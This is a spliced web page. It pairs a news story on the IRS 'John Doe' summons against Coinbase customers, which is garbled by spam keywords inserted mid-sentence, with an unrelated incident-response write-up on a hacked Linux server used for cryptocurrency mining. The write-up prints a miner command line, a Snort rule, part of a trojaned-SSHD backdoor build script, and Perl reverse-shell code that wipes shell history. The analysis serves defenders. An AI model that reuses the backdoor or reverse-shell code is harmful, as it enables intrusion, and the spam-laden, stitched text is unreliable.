A Coinbase customer had filed a motion earlier this month seeking to block the Internal Revenue Service (IRS) from issuing a “John Doe” summons to the Bitcoin exchange.The IRS has now responded to the motion by asking the court to dismiss it and to allow the tax agency to proceed with its summons.The IRS response was filed on December 27, 2016.A “John Doe” summon is an order that does not specifically identify the person but rather identifies a person or ascertainable group or class by their activities.And in November, a formal request was filed by the IRS to serve a “John Doe” summons on all United States-based Coinbase customers who transferred convertible virtual currency from 2013 to 2015.The request was granted by Judge Jacqueline Scott Corley after he found a reasonable basis for believing that certain internal revenue laws were flouted and the information sought was not readily available from other sources.Coinbase is a company which facilitates transactions of digital currencies like Bitcoin and Ethereum.

Jeffrey K. Berns, a Coinbase customer, responded by filing a motion to set aside the ruling which would prevent the summons from being issued.He did so as an “intervenor” meaning that he was asking the court to allow him to participate in the legal process even though he had not been specifically named in the original summons.Berns’ arguments were based on his concerns regarding the exposure of private customer data to hackers.He also raised his concerns regarding the effect of the summons on the entire blockchain technology industry.In turn, the IRS reiterated the objective behind the summons, which was “to produce information revealing the identity of certain unknown taxpayers.” And since Berns outed himself as a Coinbase user, he is no longer the subject of the summons or related to the matter, and the issue as it affects Berns has been resolved.Therefore, making his motion invalid.With that, the IRS wants to proceed with issuing the “John Doe” summons on Coinbase customers.

A recent statement from Mr.Berns to NewsBTC affirms that he intends to continue to vigorously seek justice for all Coinbase customers as IRS still cannot demonstrate any basis for the information they are seeking.The statement further adds that the IRS’s willingness to withdraw the summons regarding Mr.armory bitcoin wallet for androidBerns only, because it is now aware of his identity, makes it clear that the IRS does not have a legitimate purpose in seeking substantial personal and financial information concerning approximately 3 million Americans.bitcoin miner antminerAccording to the statement, the IRS summons that Mr.ethereum token icoBerns is seeking to quash does not only request customer names, but also emails, account information, transaction history and a substantial amount of additional data.bitcoin petroleum

Now, in an attempt to prevent the Court from examining its motives in pursuing this unprecedented summons, the IRS seeks to avoid the motion filed by Mr.Berns merely because he has identified himself as a customer.The statement further questions the IRS’s failure to explain its willingness to withdraw the summons as to Mr.ethereal tutorial pdfBerns, even though that means it will not obtain his personal and financial data from Coinbase.lake bitcoin exchangeAs the IRS is well aware, the purpose of the motion is to prevent the IRS from seeking significant private information concerning approximately 3 million Americans, not just Mr.Also, Coinbase still stands firm in its opposition to IRS efforts to access customer data.Coinbase had outlined in a previous statement  that while it is their practice “to cooperate with properly targeted law enforcement inquiries,” the company is “extremely concerned with the indiscriminate breadth of the government’s request.”

I recently ran across an interesting compromised system.While the initial vulnerability compromised was nothing special, compromised credentials, what the system was being used for and one of his persistence technique was a lot less common than I normally see.The system had 3 different backdoors and was used for mining virtual currency.When responding to the system, I quickly noticed that an unknown process was running.Additionally, I saw that the running process was deleted and an additional file with the process had also been deleted(See Below).This is a common technique for attackers on Linux systems, while the file is marked deleted on the file system, the process keeps it open until its stopped.1 S www-data 13335     1 99  80   0 - 13941 -      Nov10 ?12-01:46:12 ./minerd -o stratum+tcp://mine.pool-x.eu:9000 -u -p --algo scrypt --no-longpoll -B minerd    13335   www-data  txt       REG        8,1   379680     385036 /tmp/minerd (deleted) minerd    13335   www-data    4u     IPv4   14473113                 TCP d.local:41591->mine.pool-x.eu:9000 (ESTABLISHED) Minerd is used for Litecoin mining, think cheaper version of bitcoin and primed for CPU harvesting of coins.

As virtual currency values continues to increases, I’m expecting to see a lot more of these types of attacks on servers.Mining will be better financially than using the system for spamming or a basic bot.The specific mining protocol for this software is (Stratum Mining Protocol) A Sample of the traffic to the mining pool (178.33.111.19).b869b45f022a8e176a50c58af70abb4"], "00000002", "1b340532", "5283bf10", false], "i I was able to find a writeup on the protocol @mining.bitcoin.cz/stratum-mining.I did not find a snort rule for this kind of traffic.The rule below is looking at any port, as I was not able to verify the incoming port should be 9000.It seems to depend on the mining pool the attacker is using.alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Possible Bitcoin/LiteCoin Mining"; flow:established; content:"|7B 22 70 61 72 61 6D 73 22 3A 20 5B 22|"; Depth:15; classtype:bad-unknown; reference:url,mining.bitcoin.cz/stratum-mining; sid:1000500; rev:1;) The attacker had time stomped all the files in the /usr/sbin directory to hide file modifications.

We found some interesting strings in the SSH daemon to quickly discover the backdoor (See Below).Trojaned files have been around for a long time, but I do not often run into them on compromised Linux servers.In this case, the attacker was not very stealthy about modifications to the file.Partial Strings from the back door [1m |Enjoy this private backdoor!| [1m |We won't do any harm to you;) | The initial script for making the backdoor was not recovered on the servers.Other parts of the toolkit seemed to matchup.This my not be the identical script, but it was close to what was used.echo -e "${BLUE}# Backdoor Password set to : ${WHITE}${BPASS}${NORMAL}" cat backdoor.h|sed -e s/SSHD_PASS/"$BPASS"/ -e s#LOG_PATH#"$LPATH"# > 1.temp echo -e "${CYAN}# ENJOY THIS PRIVATE BACKDOOR ${NORMAL}" The second backdoor that was used is a typical IRCbot.Nothing special here, the install directory was /var/lib/.phpdata/sshd.The attacker named the script sshd to try and provide more stealth for the system.

The IRC Channel name was #MuieBa.This is a typical perl reverse shell, give the script the IP and port you want to “Shovel a shell” to.It was located in the /tmp folder and was never used by the attacker.The scripts stops the bash_history file from being saved and echos output when it connects to the destination.Its MD5 is 48d4d5a3dee9ef43e5b1387356d2f7ff and filename back.txt.print "--== ==-- "; print "Usage: $0 [Host] [Port] "; die "Ex: $0 127.0.0.1 2121 "; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host "; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host "; print "[*] Spawning Shell "; print "--== Thuraya Team ==--   "; system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo; echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); Are you seeing compromised servers being used for Mining currency?Let us know!